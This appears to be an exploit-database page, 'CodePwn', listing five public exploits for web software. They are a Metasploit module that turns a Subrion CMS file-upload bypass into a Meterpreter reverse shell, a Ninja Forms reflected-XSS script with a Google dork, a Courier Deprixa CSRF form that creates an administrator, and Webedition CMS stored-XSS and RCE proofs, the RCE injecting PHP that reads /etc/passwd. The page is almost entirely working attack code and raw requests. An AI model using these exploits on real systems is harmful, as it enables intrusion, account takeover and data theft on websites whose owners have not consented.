Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::PhpEXE include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE', 'Description' => %q{ This module exploits an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by the .htaccess file not preventing the execution of .pht, .phar, and .xhtml files. Files with these extensions are not included in the .htaccess blacklist, hence these files can be uploaded and executed to achieve remote code execution. In this module, a .phar file with a randomized name is uploaded and executed to receive a Meterpreter session on the target, then deletes itself afterwards. }, 'License' => MSF_LICENSE, 'Author' => [ 'Hexife', # Original discovery, PoC, and CVE submission 'Fellipe Oliveira', # ExploitDB author 'Ismail E. Dawoodjee' # Metasploit module author ], 'References' => [ [ 'EDB', '49876' ], [ 'CVE', '2018-19422' ], [ 'URL', 'https://github.com/intelliants/subrion/issues/801' ], [ 'URL', 'https://github.com/intelliants/subrion/issues/840' ], [ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Type' => :php, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ] ], 'Privileged' => false, 'DisclosureDate' => '2018-11-04', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(80, true, 'Subrion CMS default port'), OptString.new('TARGETURI', [ true, 'Base path', '/' ]), OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]), OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ]) ] ) end def check uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash print_status("Checking target web server for a response at: #{full_uri(uri)}") res = send_request_cgi({ 'method' => 'GET', 'uri' => uri }) unless res return CheckCode::Unknown('Target did not respond to check request.') end unless res.code == 200 && res.body.downcase.include?('subrion') return CheckCode::Unknown('Target is not running Subrion CMS.') end print_good('Target is running Subrion CMS.') # Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a> print_status('Checking Subrion CMS version...') version_number = res.body.to_s.scan(/Subrion\sCMS\sv([\d.]+)/).flatten.first unless version_number return CheckCode::Detected('Subrion CMS version cannot be determined.') end print_good("Target is running Subrion CMS Version #{version_number}.") if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1') return CheckCode::Appears( 'However, this version check does not guarantee that the target is vulnerable, ' \ 'since a fix for the vulnerability can easily be applied by a web admin.' ) end return CheckCode::Safe end def login_and_get_csrf_token(username, password) print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...') # Session cookies need to be kept to preserve the CSRF token across multiple requests uri = normalize_uri(target_uri.path, 'panel/') res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'keep_cookies' => true }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.") end # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi"> %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil? print_good("Successfully obtained CSRF token: #{csrf_token}") print_status( "Logging in to Subrion Admin Panel at: #{full_uri(uri)} " \ "using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}" ) auth = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'keep_cookies' => true, 'vars_post' => { '__st' => csrf_token, 'username' => username, 'password' => password } }) unless auth && auth.code == 200 fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.") end %r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator') fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.") end print_good('Successfully logged in as Administrator.') return csrf_token end def upload_and_execute_payload(csrf_token) print_status('Preparing payload...') # set `unlink_self: true` to delete the file after execution payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar" php_payload = get_write_exec_payload(unlink_self: true) data = Rex::MIME::Message.new data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"') data.add_part('upload', nil, nil, 'form-data; name="cmd"') data.add_part('l1_Lw', nil, nil, 'form-data; name="target"') data.add_part(csrf_token, nil, nil, 'form-data; name="__st"') data.add_part( "#{php_payload}\n", 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{payload_name}\"" ) data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"') print_status('Sending POST data...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'), 'keep_cookies' => true, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.") end payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name) print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}") # This execution request returns nil print_status("Executing '#{payload_name}'... This file will be deleted after execution.") send_request_cgi({ 'method' => 'GET', 'uri' => payload_uri, 'keep_cookies' => true }) print_good("Successfully executed payload: #{full_uri(payload_uri)}") end def exploit csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD']) upload_and_execute_payload(csrf_token) end end </code></pre>

<pre><code># Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated) # Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt # Date: 2023-07-27 # Exploit Author: Mehran Seifalinia # Vendor Homepage: https://ninjaforms.com/ # Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip # Version: 3.6.25 # Tested on: Windows 10 # CVE: CVE-2023-37979 from requests import get from sys import argv from os import getcwd import webbrowser from time import sleep # Values: url = argv[-1] if url[-1] == "/": url = url.rstrip("/") # Constants CVE_NAME = "CVE-2023-37979" VULNERABLE_VERSION = "3.6.25" # HTML template HTML_TEMPLATE = f"""<!DOCTYPE html>  <html> <head> <title>{CVE_NAME}</title> <style> body {{ font-family: Arial, sans-serif; background-color: #f7f7f7; color: #333; margin: 0; padding: 0; }} header {{ background-color: #4CAF50; padding: 10px; text-align: center; color: white; font-size: 24px; }} .cool-button {{ background-color: #007bff; color: white; padding: 10px 20px; border: none; cursor: pointer; font-size: 16px; border-radius: 4px; }} .cool-button:hover {{ background-color: #0056b3; }} </style> </head> <body> <header> Ninja-forms reflected XSS ({CVE_NAME}) Created by Mehran Seifalinia </header> <div style="padding: 20px;"> <form action="{url}/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="nf_batch_process" /> <input type="hidden" name="batch_type" value="import_form_template" /> <input type="hidden" name="security" value="e29f2d8dca" /> <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" /> <input type="hidden" name="method_override" value="_respond" /> <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" /> <input type="submit" class="cool-button" value="Click here to Execute XSS" /> </form> </div> <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div> <footer> <a href="https://github.com/Mehran-Seifalinia">Github</a> <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a </footer> </body> </html> """ def exploit(): with open(f"{CVE_NAME}.html", "w") as poc: poc.write(HTML_TEMPLATE) print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html") print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^") sleep(2) webbrowser.open(f"{getcwd()}\{CVE_NAME}.html") # Check if the vulnerable version is installed def check_CVE(): try: response = get(url + "/wp-content/plugins/ninja-forms/readme.txt") if response.status_code != 200 or not("Ninja Forms" in response.text): print("[!] Ninja-forms plugin has not installed on this site.") return False else: version = response.text.split("Stable tag:")[1].split("License")[0].split()[0] main_version = int(version.split(".")[0]) partial_version = int(version.split(".")[1]) final_version = int(version.split(".")[2]) if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25): print(f"[*] Vulnerable Nonja-forms version {version} detected!") return True else: print(f"[!] Nonja-forms version {version} is not vulnerable!") return False except Exception as error: print(f"[!] Error: {error}") exit() # Check syntax of the script def check_script(): usage = f""" Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET] OPTIONS: --exploit: Open a browser and execute the vulnerability. TARGET: An URL starts with 'http://' or 'https://' Examples: > {argv[0].split("/")[-1]} https://vulnsite.com > {argv[0].split("/")[-1]} --exploit https://vulnsite.com """ try: if len(argv) < 2 or len(argv) > 3: print("[!] Syntax error...") print(usage) exit() elif not url.startswith(tuple(["http://", "https://"])): print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'") exit() else: for arg in argv: if arg == argv[0]: print("[*]Starting the script >>>") state = check_CVE() if state == False: exit() elif arg.lower() == "--exploit": exploit() elif arg == url: continue else: print(f"[!] What the heck is '{arg}' in the command?") except Exception as error: print(f"[!] Error: {error}") exit() if __name__ == "__main__": check_script() </code></pre>

<pre><code>==================================================================================================================================== | # Title : COURIER DEPRIXA V2.5 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/ | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code create a new admin . [+] Go to the line 5. [+] Set the target site link Save changes and apply . [+] infected file : /deprixa/settings/addusersadmin/agregar.php [+] save code as poc.html [+] <h4 class="modal-title" id="myModalLabel"> New Administrator</h4> </div> <div class="modal-body">  <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php" class="form-horizontal" method="post"> <div class="form-group " id="gnombrepa"> <label for="off_name" class="col-sm-2 control-label">Name</label> <div class="col-sm-10"> <input type="text" class="form-control off_name" name="name_parson" placeholder="Name Administrator "> </div> </div> <div class="form-group" id="gapellido"> <label for="email" class="col-sm-2 control-label">Email </label> <div class="col-sm-5"> <input type="text" class="form-control email" name="email" placeholder="Email "> </div> <div class="col-sm-5"> <input class="form-control phone" name="phone" placeholder="Phone"> </div> </div> <div class="form-group" id="gemail"> <label for="office" class="col-sm-2 control-label">Office</label> <div class="col-sm-5"> <input type="text" class="form-control office" name="office" placeholder="Office "> </div> <div class="col-sm-5"> <select type="text" class="form-control role" name="role" > <option value="Administrator">Administrator</option> </select> </div> </div> <div class="form-group " id="gnombre"> <label for="off_name" class="col-sm-2 control-label">User</label> <div class="col-sm-10"> <input type="text" class="form-control off_name" name="name" placeholder="User"> </div> </div> <div class="form-group" id="gpassword"> <label for="pwd" class="col-sm-2 control-label">Password</label> <div class="col-sm-10"> <input type="text" class="form-control pwd" name="pwd" placeholder="Password"> </div> </div> <div class="form-group"> <div class="col-sm-offset-2 col-sm-10"> <div class="checkbox checkbox-success"> <input id="checkbox3" type="checkbox" name="estado" value="1" checked> <label for="checkbox3"> Status </label> </div> <div class="checkbox checkbox-inline" > <input type="checkbox" name="type" value="a" onclick="return false" checked> <label for="inlineCheckbox3"> Type of user </label> </div> </div> </div>  </div> <div class="modal-footer"> <button type="button" class="btn btn-default" data-dismiss="modal"> Close</button> <input class="btn btn-success" name="Submit" type="submit" id="submit" value="Save"> </div> </form> </div> </div> </div> <!--fin de mo Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS Application: Webedition CMS Version: v2.9.8.8 Bugs: Stored Xss Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1. Login to account 2. Go to New -> Media -> Image 3. Upload malicious svg file svg file content: """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ Poc request: POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1 Host: localhost Content-Length: 761 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300 Connection: close we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1 </code></pre>

<pre><code>Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Application: webedition Cms Version: v2.9.8.8 Bugs: RCE Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1. Login account 2. Go to New -> Webedition page -> empty page 3. Select php 4. Set as "><?php echo system("cat /etc/passwd");?> Description area Poc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1 Host: localhost Content-Length: 1621 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300 Connection: close we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1 </code></pre>